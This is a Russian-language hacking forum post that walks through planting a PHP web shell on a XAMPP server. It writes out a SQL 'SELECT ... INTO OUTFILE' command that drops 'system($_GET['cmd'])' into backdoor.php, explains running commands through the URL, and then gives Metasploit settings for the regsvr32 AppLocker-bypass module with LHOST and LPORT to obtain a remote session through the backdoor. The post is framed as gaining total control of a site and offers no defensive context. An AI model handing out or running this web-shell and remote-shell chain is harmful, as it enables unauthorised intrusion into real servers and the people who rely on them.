Загрузка...

Uploading shell code to our web server.

Thread in Web vulnerabilities created by ТипаЕллиот Apr 12, 2017. (bumped Feb 23, 2017) 1055 views

  1. ТипаЕллиот
    ТипаЕллиот Topic starter Apr 12, 2017 17 Oct 21, 2016
    Добрый вечер,господа.
    Сегодня мы рассмотрим с вами загрузку shell-кода на сервер(сайт).
    В качестве платформы будем рассматривать XAMPP,о котором я напишу в следующей статьи.

    Для начала работы,у нас должен будет сгенирирован запрос SQL для выполнения нашего shell-кода,а потом попотеть,что бы получить полный доступ.
    Сначала работать будем c PhpMyAdmin.

    1.Заходим в панель управления и создаём новую SQL-базу(базу данных).
    2. После того,как создали и выбрали эту базу,мы открываем поле SQL и вписываем туда представленный ниже код генерации запроса:

    Code
    > SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

    3. По теории,наша уязвимость создана,но что бы проверить достаточно обратиться к серверу по адресу localhost/backdoor.php
    Если мы получаем выхлоп,в котором сказано о успешной работе(скрин приложу потом),то наш бэкдур создан.

    Используя адресную строку в браузере мы можем передовать команды из cmd на сервер.

    Далее,что бы получить полный(тотальный) контроль над сайтом,достаточно воспользоваться утиллитой - Meterpreter Console (msfconsole).
    Открываем нашу утиллиту,используем эксплоит(regsvr32)

    Code
    use exploit/windows/misc/regsvr32_applocker_bypass_server

    Далее настраиваем наш эксплоит:

    Code
    set LHOST *IP-адрес сервера*
    set LPORT 4444
    exploit

    Выделенный текст нам нужно будет использовать как команду в cmd,т.е. ***** текст вместе с ссылкой:
    []SRC] localhost/backdoor.php?cmd=*текст*[/SRC]

    Вот и всё.
     
Loading...
Top